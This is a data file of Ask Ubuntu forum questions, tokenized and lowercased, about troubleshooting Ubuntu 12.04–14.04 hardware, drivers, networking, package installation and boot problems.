523406	tablet mapping problem on ubuntu 14.04.1 lts	recently i have installed ubuntu 14.04 on my computer . everything works fine . but i ca n't find an option for me to configure out how to set a mapping for my wacom tablet . could anyone give me an instruction to set it ? ( sorry for my bad english : p
523407	ubuntu equivalent of the cisco anyconnect vpn client	is there a debian/ubuntu equivalent package of the cisco anyconnect vpn client ? if so then how do i install and use it ?
523409	juju - deployed wordpress and mysql - error establishing a database connection	after a week of deploying wordpress on juju with mysql , the site has gone down with the error : `` error establishing a database connection '' . juju status is not working at all and i ca n't seem to ssh on any of my machines now . i am using a local-provider environment . if anyone can help , i 'll greatly appreciate it .
523410	ubuntu 14.04 crashes when copying files from external usb disk	i have a clean install of ubuntu 14.04 minimal + openbox on my machine . everything works as expected . however , when i try to copy files from external usb disk , the system just crashes after completing 2 % or 3 % of the operation . this is a real crash . i get colored boxes on the screen . this is a dual-boot system . when i boot from windows 7 and copy files , things work just fine . to be sure , i once again ran a clean install of 14.04 ( with all the updates and upgrades ) . however , the problem does not go away . the file size is about 5g . however , i do n't think that should make any difference . when i try to play the file directly from vlc , i get the same crash after playing for a minute or so . i never had this problem with ubuntu 13.04 on the same machine . something has definitely changed between 13.04 and 14.04 when it comes to usb . i am wondering if there is something that can be done to fix this .
523415	i ca n't fixings my brightness . in ubuntu 14.04	i ca n't fixings my brightness in zero level . it changing every time , when the system restarting .
523416	ca n't get plex to find folders on external drives	i just switched from windows xp to ubuntu since all i use is firefox and plex . unfortunately , all my media is stored on two external drives but i ca n't get plex to `` see '' anything on the drives . any idea how ?
523417	swapping caps lock and ctrl via udev	i want to swap caps lock and ctrl . my solution so far is to edit /etc/default/keyboard and setting xkboptions= '' ctrl : nocaps '' there are problems with this solution . first it does n't work with virtual consoles and it does n't work with source games . see https : //github.com/valvesoftware/dota-2/issues/47 my keyboard is : i : bus=0011 vendor=0001 product=0001 version=ab54 n : name= '' at translated set 2 keyboard '' p : phys=isa0060/serio0/input0 s : sysfs=/devices/platform/i8042/serio0/input/input2 u : uniq= h : handlers=sysrq kbd event2 b : prop=0 b : ev=120013 b : key=402000000 3803078f800d001 feffffdfffefffff fffffffffffffffe b : msc=10 b : led=7 i tried to follow this guide https : //wiki.archlinux.org/index.php/map_scancodes_to_keycodes but it is not working .
523420	ubuntu does not let me in past the password	i am an ubuntu newbie ( currently i have the 14.04 lts version ) , and i was trying to uninstall skype so i followed a tip from this forum that told me to do the following in the console ; sudo apt-get purge skype* sudo apt-get autoremove then you can remove the config files : rm -fr ~/.skype the thing is that after doing that it was all wrong , it would not let me into the files folders ( any ) and it seemed to have no information at all , so i restarted it and now it does not let me go pass the password ( i have never changed it ) . specifically it starts normal but when you are supposed to put the password i keep putting it and it keeps coming back to the same start up screen without letting me in . i seriously have no idea what happened , that was the only 'weird ' thing i did , are all my files gone ? is there anything i can do to get it back ? help ! ! !
523422	how to uninstall kdenlive ?	i have install kdenlive , now i feel i do n't need it do and so i want to uninstall it . normally i use to uninstall from lens . i used to right click on application and then uninstall it . this time it does not show uninstall option . how to uninstall it ?
523423	using apt-get how to check have installed latest version ?	hello im just new for linux i know that sudo apt-get is for installing application but how i would know that i have installed the latest version of the application for example apt-get install sun-java6-jdk is there an option to upgrade or see the latest version or its ok to install an old version the application and linux will upgrade it for me ?
523426	photo recovery ubuntu	i know there are already answered question about this . i installed ubuntu in my system and deleted all the windows partition . now i did not create a backup of all my files ( yea , i know ) . i want to ask if i can recover those files . i have tried photorec but it recovers all files . i just want to recover .jpg extensions . can somebody enlighten me . i a complete beginner in ubuntu .
523429	new hard drive install	i am thinking about installing new hard drive in laptop i want to insall ubuntu 14.04 do i need to insall any drives or othe programs 1st or can i just plug in new hard drive and install ubuntu
523434	laptop lenovo v570 built in camera not working on ubuntu 14.04	$ sudo ls /dev/video* ls : can not access /dev/video* : no such file or directory
523438	why system assigns a `` volume name '' for a binded `` /tmp '' ?	( the problem is found on : kubuntu 13.10 ) initially /tmp is not binded . system has a volume with a label `` vol_2 '' ( e.g. , /dev/sda2 ) . a user logs in . the user mounts the volume `` vol_2 '' to /media/vol_2 ( if this drive is not mounted yet ; this one might be mounted in the previous session ) . the user starts the file manager ( dolphin ) . device list contains an item `` vol_2 '' . the file manager ( dolphin ) for this device displays content of `` ( /dev/sda2 ) / '' . the user runs : sudo mount -- bind /media/vol_2/tmp /tmp the user starts the file manager ( dolphin ) . device list contains an item `` vol_2 '' . the file manager ( dolphin ) for this device displays content of `` ( /dev/sda2 ) /tmp '' ( not `` ( /dev/sda2 ) / '' ) . 10 . why ? is this behavior defined by ubuntu or by kde ? the file manager ( dolphin ) displays proper content of the folder `` /media/vol_2 '' .
523440	where should i now go best ? ! ( somehow uncertain here )	now i see that there are two different areas ? ! for those with 12.04.04lts - good old site - and for those with 14.04lts ( blue site ? ) - this idea is not bad , only want to say , that to fix 14.04 is getting trickier because of bios-variations ... so am now learning that the `` allrounder '' -version 12.04.04lts for linux/mac is working at best here ... but it is getting malformed by updates ? ! ( without gnome-desktop ) ... 14.04 seems to be under attack of bios-specific-built-in backdoors for whom ? ! ( s.c.o.r.p.i.o ? ! ) - what should i do next best ? ! here is trouble that apparently electricity-cables are scanned too ( like experts from switzerland already had done this at others ? ! - is this the new austrian wave of linux-lovers ? ! ) - because datas are modified ( without update ) only by electricity-plugin ( belkin ? ! ) - is this an arabian april-joke ( april-bug ? ! ) ... in night of 5th to 6th august i had directly in front of my glass door here ( veranda ) 4 times a ball-lightning ( foo ) - is there somehow the difference between tesla and edison misunderstood again ? ! ( isnogood is greeting now or what ? ! )
523442	ubuntu 14.04.1 64 bit freezing on wake-up	my full system specs are : os : ubuntu 14.04.1 , 64 bit cpu : intel i7 4710hq ( 4 core , 8 thread , 2.5 ghz , 3.5 ghz turbo ) ram : 12 gib ddr3 @ 1600mhz gpu : amd/ati radeon 8850m ( aka r9 m265x ) ssd : 512 gib crucial m550 the system is a toshiba laptop model p50-b . it works fine and dandy until i close the lid and it goes to sleep . when coming out of sleep it does either one of two things : freezes half way and lets me ctrl + alt + f* freezes all the way and i need to do a hard reboot ( makes me sad : ( ) . any help on the matter would be much appreciated ! things i have already tried : installing proprietary drivers messing with some settings in catalyst changing the graphics over to intel 's integrated
523446	what is the best way to run multiple computers with multiple vms ?	i have a 2010 imac running six ubuntu vms . each of these virtual machines use one application and a web browser - ideally , running 24/7 . i 'd like to determine the most efficient and economical way to set up two or three new machines , each of them running two or three vm instances of ubuntu . that would take the strain off my imac , and it would allow me to effectively grow my setup in a modular fashion . i would think that i could install some sort of vnc client ( like logmein ) on the new computers , and then i could control the vm 's from the chosen tower .
523450	problems with software center	i am unable to launch software-center on my laptop . no matter how many times i try clicking on the icon , it never launches . i tried to see if it is already working by typing the following command in the terminal : sudo killall software-center and it says : software-center : no process found i tried to reinstall software-center by using the following commands : sudo apt-get update it gives me the following message : reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_precise_main_binary-i386_packages e : the package lists or status file could not be parsed or opened . and followed by : sudo apt-get -- purge -- reinstall software-center i get the following error message : e : invalid operation software-center also , i am unable to install any software from the terminal . for instance i tried to install vlc player by using the command : sudo apt-get install vlc and i get the following error message : reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists /us.archive.ubuntu.com_ubuntu_dists_precise_main_binary-i386_packages e : the package lists or status file could not be parsed or opened . please help me out .
523451	right after installing ubuntu 14.04.1 lts it just do n't work	i 've just installed ubuntu 14.04.1 lts ( desktop , 32 bits version ) , when the computer reboots ubuntu ask me for the user and password configure . right after entering this information , the pc freezes , and the display shows a disturbed image i 've tried the installation 3 times and it is the same problem . what is going wrong here ?
523453	intel centrino wirelsess-n 1030 not getting connected on generic mode in ubuntu 14.04	i really need your help guys . i am very new to ubuntu . i am facing the weird problem in ubuntu . i tried upgrading ubuntu from 12.04 to 14.04 which i think i made a big mistake in my life . i have mentioned my few problem below : - after upgrade to new ubuntu version , it does not support both wlan and ethernet and also does not work in recovery mode ( enable networking ) or root shell . when i go to previous version from boot menu , the ubuntu version is again 14.04 . but the wireless and lan works ( show ssid ) but does not get connected no matter how many time i try . for a wireless to get connected i have to go to recovery mode of previous version and then go to recovery mode ( enable networking ) . but then the desktop graphics are all stretched : ( i tried millions of command as suggested from other solved site for my wireless network but it did not work for me . truly speaking i do not really know about any command line but i know something is surely wrong that i my wireless connects in recovery mode ( enable netwroking ) but not in generic mode . are n't there any method to make changes from recovery mode ( with connected network ) and make changes to generic mode . as i cant run apt-get command from generic mode . sorry if my questions are silly but i really need you expert help . thanks in advance . god bless u all ! !
523455	having trouble with a setup.exe on mounted .bin	attempting to install torchlight ( a game ) . i successfully mounted the .bin image using furius , opened the disc image , and then attempted to use `` run software '' with the setup.exe . it prompts : âtorchlight_binâ contains software intended to be automatically started . would you like to run it ? > yes oops ! there was a problem this software . unable to find the program . what am i doing wrong ? tips/ pointers ? thank you community . good folk !
523456	i have some problems when the system starts	i installed ubuntu 14.04.01 on my laptop ( acer aspire v3-571 ) . this is my specs : intel i3-3120m 2.5 ghz ( 2 cores , 4 threads ) ram 4 gb 64-bit system installed 3 usb ports ( two 2.0 , one 3.0 ) when ubuntu starts i see black screen with two lines : '' usb string descriptor read error '' , after what system starts how can i fix it ? by the way , in other linux like kubntu , lubuntu , xubuntu , linux mint i do n't have such problem .
523457	how to free disk space on disk '/boot	error reads : the upgrade needs a total space of 81.5 m , free space on disk'/boot ' . please free at least an additional 66.5 m of disk space on '/boot ' . empty trash and remove temporary packages of former installations using sudo apt-get clean . wish i did but did not work at all what can i do ?
523458	unable to connect to any wifi in ubuntu 14.04	i have ubuntu 14.04 . i 've tried connecting to the at & t router in my apartment , but i can not see the symbol . i 've tried installing drivers for the wifi router from additional driver but there no drivers in the list . output of the lspci command is : 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm77 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] thames [ radeon hd 7500m/7600m series ] ( rev ff ) 07:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 08:00.0 network controller : broadcom corporation bcm43142 802.11b/g/n ( rev 01 )
523461	how to install suggested package after installation main package ?	i just install chromium-browser and installation list some suggested packages to install and i continued installation and done it . $ sudo apt-get install chromium-browser reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : chromium-browser-l10n chromium-codecs-ffmpeg-extra suggested packages : webaccounts-chromium-extension unity-chromium-extension chromiumflashplugin then i decide to install a suggested packages that listed in above installation progress but i get error : $ sudo apt-get install chromiumflashplugin reading package lists ... done building dependency tree reading state information ... done package chromiumflashplugin is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'chromiumflashplugin ' has no installation candidate i tried also with following the command : $ sudo apt-get -o apt : :install-suggests= '' true '' install chromium-browser reading package lists ... done building dependency tree reading state information ... done chromium-browser is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 364 not upgraded . how can i install this package ? if it is only available from another source why ( ? ) installation suggest that ?
523462	wifi has trouble randomly disconnects in ubuntu lenovo ideapad flex 15	i recently bought a lenovo ideapad flex 15 touch dual mode 15.6â notebook intel core i7-4500u and my wireless connection keeps disconnecting and the only way to reconnect it is to unplug my network adapter and plug it back in and some times i had to reboot . i have ubuntu 14.04 . i followed the instructions mentioned in this post : wireless driver lenovo flex 14 ubuntu 12 ultrabook i downloaded the stable backport drivers version backports-3.13-1.tar.gz which is same of my kernel version 3.13.0-35-generic but the command make fails i get this output sudo make / -- -- -- -- -- -- -- | your backport package is n't configured , please configure it | using one of the following options : | to configure manually : | make oldconfig | make menuconfig | | to get defaults for certain drivers : | make defconfig-alx | make defconfig-ar5523 | make defconfig-ath10k | make defconfig-ath5k | make defconfig-ath6kl | make defconfig-ath9k | make defconfig-ath9k-debug | make defconfig-b43 | make defconfig-b43legacy | make defconfig-brcmfmac | make defconfig-brcmsmac | make defconfig-carl9170 | make defconfig-cw1200 | make defconfig-ieee802154 | make defconfig-iwlwifi | make defconfig-media | make defconfig-nfc | make defconfig-regulator | make defconfig-rtlwifi | make defconfig-wcn36xx | make defconfig-wifi | make defconfig-wil6210 | make defconfig-wwan \ -- make [ 2 ] : *** [ .config ] error 1 make [ 1 ] : *** [ modules ] error 2 make : *** [ default ] error 2 any ideas how to get the wireless working ? here 's the output from my ubuntu : $ sudo lshw -c network *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 08 serial : 08:9e:01 : f4:45 : f7 size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl8106e-2_0.0.1 04/23/13 latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:60 ioport:3000 ( size=256 ) memory : b0504000-b0504fff memory : b0500000-b0503fff *-network description : wireless interface product : wireless 7260 vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 73 serial : 0c:8b : fd:94:13:1c width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.13.0-35-generic firmware=22.24.8.0 ip=192.168.0.12 latency=0 link=yes multicast=yes wireless=ieee 802.11bg resources : irq:62 memory : b0400000-b0401fff $ uname -a linux chaari-lenovo-ideapad-flex-15 3.13.0-35-generic # 62-ubuntu smp fri aug 15 01:58:42 utc 2014 x86_64 x86_64 x86_64 gnu/linux
523463	how to make nvidia logo always visible before login screen ?	after installing nvidia drivers from the manufacturer 's website , i sometimes get a nice nvidia logo ( full screen ) right before the login screen appears , and sometimes i get straight to the login screen without the nvidia logo . is there any command or tweak to keep this nvidia logo always visible before getting to the login screen ? i know this is not a big issue , the system does not complain at all about the nvidia logo , and runs as smoothly as possible , but i would like to see that nice logo from nvidia each time i boot ubuntu ( in my particular case , it is xubuntu 12.04.5 but i experienced same issue with ubuntu 12.04.4 , ubuntu 13.10 and also with the infamous ubuntu 14.04 ) . many thanks , by the way , to all ubuntu developers who put together ubuntu 12.04.5 and all its `` relatives '' ( best ubuntu version ever in my opinion ! ) .
523464	ubuntu tty and desktop cut off , right half black	so i think this problem can best be described with pictures . after some time , the gui in tty7 scretches and fits the whole display . but after logging out , the issue comes back . also the virtual consoles do not scretch , they continue to cut off . thanks for the help . graphics card is intel bay trail . dell inspiron 3531
523466	how to install dlink dwa525 driver for ubuntu 12.04 ?	i just tried out the following steps to install the d-link driver . sudo apt-get update wget http : //rt2x00.serialmonkey.com/pipermail/users_rt2x00.serialmonkey.com/attachments/20120507/e2072201/attachment.bin wget http : //www.orbit-lab.org/kernel/compat-wireless-3-stable/v3.4/compat-wireless-3.4-rc3-1.tar.bz2 tar -xjf compat-wireless-3.4-rc3-1.tar.bz2 cd compat-wireless-3.4-rc3-1 patch -p1 < ../attachment.bin ./scripts/driver-select rt2x00 make sudo make install sudo make unload sudo modprobe rt2800pci i get the following error when i tried the above steps make -c /lib/modules/3.5.0-54-generic/build m=/home/praveen/compat-wireless-3.4-rc3-1 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.5.0-54-generic' cc [ m ] /home/praveen/compat-wireless-3.4-rc3-1/net/wireless/nl80211.o /home/praveen/compat-wireless-3.4-rc3-1/net/wireless/nl80211.c : in function ‘nl80211_msg_put_channel’ : /home/praveen/compat-wireless-3.4-rc3-1/net/wireless/nl80211.c:359:2 : error : implicit declaration of function ‘nla_put_u32’ [ -werror=implicit-function-declaration ] /home/praveen/compat-wireless-3.4-rc3-1/net/wireless/nl80211.c:363:3 : error : implicit declaration of function ‘nla_put_flag’ [ -werror=implicit-function-declaration ]
523468	ubuntu 14.04 wacom intuos cth480 issue	so ... most places i look it says that ubuntu 12.04+ should have wacom tablets working out of the box . the pen works , but touch does n't . the linux wacom project says to install xf86-input-wacom i got the error on this thread : configuring wacom tablet on ubuntu 12.10 by installing missing dependencies . the response there was that everything should work . but i do n't have touch working . so i installed the dependencies and retried . it installed but still no touch . does anyone else have this tablet working on ubuntu ?
523472	how do i install ubuntu from usb in debian ?	after looking through the ubuntu instructions for creating a bootable usb i googled this and it seems like there 's a plethora of different ways that one could do this . here 's what i 've tried : download the ubuntu 14.04.1 desktop 64-bit iso . find a link explaining how to create a bootable ubuntu iso . run dd if=path/to/iso of=/dev/sdd1 as per instructions . try to boot . nothing ( blinking cursor , no activity until i hit ctrl+alt+del look for another link , this time telling me to install unetbootin try to boot , get a failed to load com32 file menu.c32 . the fix is look for a file . checked . does n't exist on my system . go and google again . this time i 'm told debian isos can be copied directly . maybe ubuntu isos can be copied in this way ? nope . check instructions on ubuntu website for again . instructions were less than helpful . come here and ask . does anyone have a way of creating a bootable ubuntu usb stick that works with ubuntu 14.04 and can be used in a debian system ?
523475	*i need commands for ubuntu*	*i need networking commands in ubuntu of all which avoid some complications in different operating systems *
523476	copy paste objects in folder not working in virtualbox installed in ubuntu	not sure if its i am using the right platform to ask my current issue . but your expert suggestion needed . i am new user to ubuntu machine and virtualbox window 7 also installed in my machine . whenever i am copy any embedded object from any excel/word document and paste in desktop or any folder then its working fine . now when i am trying same in vm window 7 than the files which i paste in desktop or any folder then its showing corrupted . can any body suggest me if any other thing needs to be installed in ubuntu or virtualbox ? so that copy paste of embedded objects working file in ubuntu machine also . thanks in advance for your expert advice .
523478	vision plus 2000 usb drive	i had searched for vision plus 2000 usb driver .. i found one on google code , but its last update was 2008 .. the other was script and am not actually understand how it works or how it can be done ! if anyone can help me i will be thankful .
523479	how to install tinyos-2.x.x in ubuntu 12.04 precise	i am using ubuntu 12.04 , i need to install tinyos 2.x.x ( any version ) in my ubuntu . i have seen so many procedures , but most of them tells me to add following in sources.list deb http : //tinyos.stanford.edu/tinyos/dists/ubuntu lucid main deb http : //tinyos.stanford.edu/tinyos/dists/ubuntu maverick main deb http : //tinyos.stanford.edu/tinyos/dists/ubuntu natty main but i have precise version , so kindly help me , $ cat /etc/lsb-release distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04.5 lts ''
523483	ubuntu hangs at loading ramdisk !	while running ubuntu in recovery mode , it hangs at `` loading initial ramdisk . '' what should i do ? in normal mode also ubuntu is not loading . i am using amd processor with ati graphics card .
523484	sleep mode when pressing key on keyboard its not wake up	this is inform to you all i have installed ubuntu on dell 990.we are using that system on 24*7.whenever the system going sleep mode , after giving input from keyboard its does n't wake up.every time we hot shutdown and restarting for further use.for that we have changed every thing like power card , keyboard , mouse , dvi cable.after changing all those one by one i ca n't resolve my problem.only two system its not wake up.rest of the same model on my lab its wake up during input given on sleep mode time . thanks & regards , selvamurugan.t +91-97152 96151
523485	ubuntu on galaxy tab 2 10.1	i 've seen that there is an on-offical version of this available for my tablet . i was wondering if anyone here has tried it , and if it 's actually worth installing . i like the idea but all the info i 've seen makes it look like this is only a proof of concept at this stage .
523486	why does my screen setting and keyboard layout reset after sleep in 14.04 ?	this is a very frustratig thing that has been an issue since i uppgraded from 13.10 a couple of days ago . i have my laptop connected to an external monitor , and every time i close the lid , the computer sleeps . when i open the lid again , the screens are in the wrong place , the primary screen has been changed and my keyboard layout is set back to english ! how can i solve this issue ? as i do now , i have a script with the code below and run it manually every time i log in , but that is not how i want it . xrandr -- output vga1 -- primary -- left-of edp1 setxkbmap se
523488	quad nics work one at a time	quad nics are not working completely . but there is no error on syslog to trace what 's going . lspci | grep ethernet 05:04.0 ethernet controller : digital equipment corporation decchip 21142/43 ( rev 41 ) 05:05.0 ethernet controller : digital equipment corporation decchip 21142/43 ( rev 41 ) 05:06.0 ethernet controller : digital equipment corporation decchip 21142/43 ( rev 41 ) 05:07.0 ethernet controller : digital equipment corporation decchip 21142/43 ( rev 41 ) 06:04.0 ethernet controller : digital equipment corporation decchip 21142/43 ( rev 41 ) 06:05.0 ethernet controller : digital equipment corporation decchip 21142/43 ( rev 41 ) 06:06.0 ethernet controller : digital equipment corporation decchip 21142/43 ( rev 41 ) 06:07.0 ethernet controller : digital equipment corporation decchip 21142/43 ( rev 41 ) 07:04.0 ethernet controller : digital equipment corporation decchip 21142/43 ( rev 41 ) 07:05.0 ethernet controller : digital equipment corporation decchip 21142/43 ( rev 41 ) 07:06.0 ethernet controller : digital equipment corporation decchip 21142/43 ( rev 41 ) 07:07.0 ethernet controller : digital equipment corporation decchip 21142/43 ( rev 41 ) only 4 ports are connected for testing the result of running lshw -c network | egrep 'logical|irq' pci ( sysfs ) logical name : eth3 resources : irq:20 ioport : b080 ( size=128 ) memory : f7601000-f76013ff memory : f7540000-f757ffff logical name : eth6 resources : irq:20 ioport : a100 ( size=128 ) memory : f7402000-f74023ff memory : f7380000-f73bffff logical name : eth10 resources : irq:19 ioport:9100 ( size=128 ) memory : f7202000-f72023ff memory : f7180000-f71bffff logical name : eth12 resources : irq:16 ioport:9000 ( size=128 ) memory : f7200000-f72003ff memory : f7100000-f713ffff and the result of running ifconfig | egrep 'eth|inet ' is as following : eth3 link encap : ethernet hwaddr 00:80 : c8 : b9:86 : f7 inet addr:192.168.99.101 bcast:192.168.99.255 mask:255.255.255.0 eth6 link encap : ethernet hwaddr 00:80 : c8 : ca:73:36 inet addr:192.168.99.102 bcast:192.168.99.255 mask:255.255.255.0 eth10 link encap : ethernet hwaddr 00:80 : c8 : b9:90 : be inet addr:192.168.99.104 bcast:192.168.99.255 mask:255.255.255.0 eth12 link encap : ethernet hwaddr 00:80 : c8 : b9:90 : c0 inet addr:192.168.99.103 bcast:192.168.99.255 mask:255.255.255.0 when eth3 works then rest of all stop working and if i unplug/plug that port will work again . please shed some light on this .
523489	undetected resolution with 14.04	i am an utterly starter but need to change from vista to linux with my pc : epson nj2100 ( wxza wide scren of 5:3 ) . according to the manual of virtualbox , i have used cvt/xrandr commands for guestaddtions to finally get such an error message below : x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 140 ( randr ) minor opcode of failed request : 80 ( rraddoutput mode ) serial number of failed request : 20 current serial number in output stream:21 â ămy last command was : xrandr -- addmode vbox0 `` 1593x903_60.00 ) i also failed using the same resolution with previous windows vista . i downloaded virtualbox for linux hosts ( applicable to ubuntu 14.04/13.10 ) i completed commands such as apt-get update apt-get upgrade apt-get install dkms i am very much appreciated if you have any advice ! thanks in advance . peko
523490	how do i enable touchpad right click in ubuntu 14.04 on a dell vostro 5470 ?	i have a little trouble with touchpad ca n't right-click on a dell vostro 5470.i 'm uising ubuntu 14.04 lts.in before , i try to rebuild user environment.but it looks no help for this .
523491	maas cluster without juju and openstack	i could n't find proper documentation about maas installation but finally i made my own maas server and 1 node and it is working now . my idea about maas was that nodes share their computing power with the cluster controller server but things are not working like this . everyone including ubuntu forcing users to install juju on maas cluster . does maas spread my workload automatically in terms of send workload to nodes . i do n't want to use juju , charms & openstack . can i replace maas cluster with beowulf cluster ?
523492	ubuntu upgrade using startup disk asks for new user creation	i am on ubuntu 12.10 and want to upgrade to 14.04 . i created a startup disk of 14.04 iso and booted my system using it . now i get an option to upgrade 12.10 to 14.04 but it asks me to create a user after selection . i am bit scared as i do n't want to create a new user and lose my existing home users . please help me to upgrade my ubuntu without losing existing users home directory .
523494	having trouble configuring code : blocks to work	i seem to be having trouble in getting code : blocks to work properly within ubuntu 14.04 lts . i simply installed it from the software center , however everytime i try to build and run my code it does nothing , nothing at all . i keep trying to run the code but it seems to fail . note i just checked and found that it does return an error : g++ -wall -fexceptions -g -c `` /home/james/documents/c++ projects/bin/sh : l : g++ : not found if anybody could help me troubleshoot this error i would greatly appreciate it , it seems things are a lot more complicated to install on linux .
523495	how to remove member in group without admin	sir i need one help we have our community small group one of my friend created last month unfortunately he deactivated that account so there is no admin here how can i make admin there we wants to block one person how to help me please akbarali
523497	error in gnome installing	hello guys i am installing gnome shell in ubuntu 14.04 but i got this error : gnome-shell : depends : gnome-settings-daemon ( > = 3.4.0 ) but it is not going to be installed recommends : gnome-control-center but it is not going to be installed i also tried to install it through synaptic , but it still was n't installed .
523498	how to install ubuntu on dell laptop which already have windows 7	i have dell-vostro 1540-amd64 architecture-500 gb laptop . had two partitions with 270 gb for windows 7 and remaining is unallocated . successfully installed windows 7 on 270gb partition . i want to install ubuntu on another partition with 200 gb . made usb stick ( fat32 ) as bootable disk with ubuntu-14.04.1-desktop-amd64.iso . to install ubutnu 14.04 on my machine , tried to install from usb stick while booting . it 's always getting shuts down after select the language as `` english '' . how to install ubuntu on laptop where windows 7 already exists . any inputs ? thanks .
523499	how to create laptop backups that can be restored to a bootable virtual machine	is there some way to configure déjà dup to create backups of a laptop to a server , such that the the most recent backup can be restored directly to ( a bootable ) virtual machine if the laptop is lost ( or stolen ) ? if not via déjà dup , then perhaps some other backup tool ? ( i recall this is easy to do with symantec ghost on windows. )
523503	cant donwload nor update on 12.10	i cant change software source and i cant install any software from ubuntu center . appears a box with message : `` check internet connection '' . also cant update or do anything on terminal
523505	comodo installation	i have run post_setup.sh and i get the following errors - /tmp/driver/redirfs/rfs_file.c : in function ‘rfs_readdir’ : /tmp/driver/redirfs/rfs_file.c:259:37 : error : ‘const struct file_operations’ has no member named ‘readdir’ if ( rfile- > op_old & & rfile- > op_old- > readdir ) ^ /tmp/driver/redirfs/rfs_file.c:260:35 : error : ‘const struct file_operations’ has no member named ‘readdir’ rargs.rv.rv_int = rfile- > op_old- > readdir ( ^ /tmp/driver/redirfs/rfs_file.c : in function ‘rfs_file_set_ops_dir’ : /tmp/driver/redirfs/rfs_file.c:313:15 : error : ‘struct file_operations’ has no member named ‘readdir’ rfile- > op_new.readdir = rfs_readdir ; ^ make [ 2 ] : *** [ /tmp/driver/redirfs/rfs_file.o ] error 1 make [ 1 ] : *** [ _module_/tmp/driver/redirfs ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.13.0-32-generic' make : *** [ all ] error 2 make -c /lib/modules/`uname -r`/build m=/tmp/driver/redirfs modules_install make [ 1 ] : entering directory `/usr/src/linux-headers-3.13.0-32-generic' depmod 3.13.0-32-generic make [ 1 ] : leaving directory `/usr/src/linux-headers-3.13.0-32-generic' make -c /lib/modules/`uname -r`/build m=/tmp/driver/avflt extra_cflags=-i/tmp/driver/redirfs modules_install make [ 1 ] : entering directory `/usr/src/linux-headers-3.13.0-32-generic' depmod 3.13.0-32-generic make [ 1 ] : leaving directory `/usr/src/linux-headers-3.13.0-32-generic' modprobe : fatal : module redirfs not found . redirfs kernel modules installation failed .
523507	ubuntu behavior on overheating ?	i have a laptop that i suspect is overheating . every once and a while , ubuntu will pop up the shut down dialogue window . the first time i clicked shut down , and it went through the normal shut down process . the 2nd time i pressed cancel , and it instantly hard shut down . so , could this dialogue window pop up because the computer is overheating ? or is the issue something else ? edit : the processor does not seem to be overheating when it shuts down . could it be the gpu ? thanks , blaine side note : this laptop also has problems with random boots .
523508	problem partitioning ubuntu as dual boot	i have installed windows 8.1 ( 64bit ) , when i try to install ubuntu alongside with windows , it does n't shows the alongside windows option , and when we select sometlthing else option , it shows as if the entire disk is unallocated , it does n't recognize the partitions . please guide me to partition and install ubuntu along with windows
523510	how to change the colours in gtk3 themes	how to change the colors of a gtk3 theme ? is there any way to that ? kindly assist .
523512	wifi not working - broadcom b4312	and i have tried almost all the solutions to get my wifi work . i have compaq laptop with broadcom b4312 wifi adapter . i have tried installing bcmwl-kernel-source and then b43 drivers . the result for both of them is that sometimes wifi gets connected but most of the times it does n't . actually , for the very first time only it worked and then i tried to resolve the problem by switching to another driver but then no luck till now . i earlier had windows xp which gets crashed with blue screen error . that happened when i pressed my wifi button . on windows , i tried reinstalling the wifi driver but the problem was the same . windows sometimes connects to wifi but crashes with blue screen . i tried to connect by ethernet on windows , but still it was crashing with blue screen . and now i fed up . i dual booted to ubuntu and writing this post . on ubuntu , when i tried to connect via ethernet , it top right connection icon shows this as connected but there is no packet transfer . sometimes , i try by restarting network manger service . it worked few times but not anymore . i am doubtful about my laptop wifi adapter . i suspect that it is causing problems . can anybody tell me , how can i confirm whether my wifi adapter is faulty or not ? p.s . : i can see the wifi adapter entry in lspci output . i have tried to use a usb wifi device , and it just worked with no issues . if my adapter is faulty , what steps i should take to completly remove it or disable it ? following is output of lspci , iwconfi commands . 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] 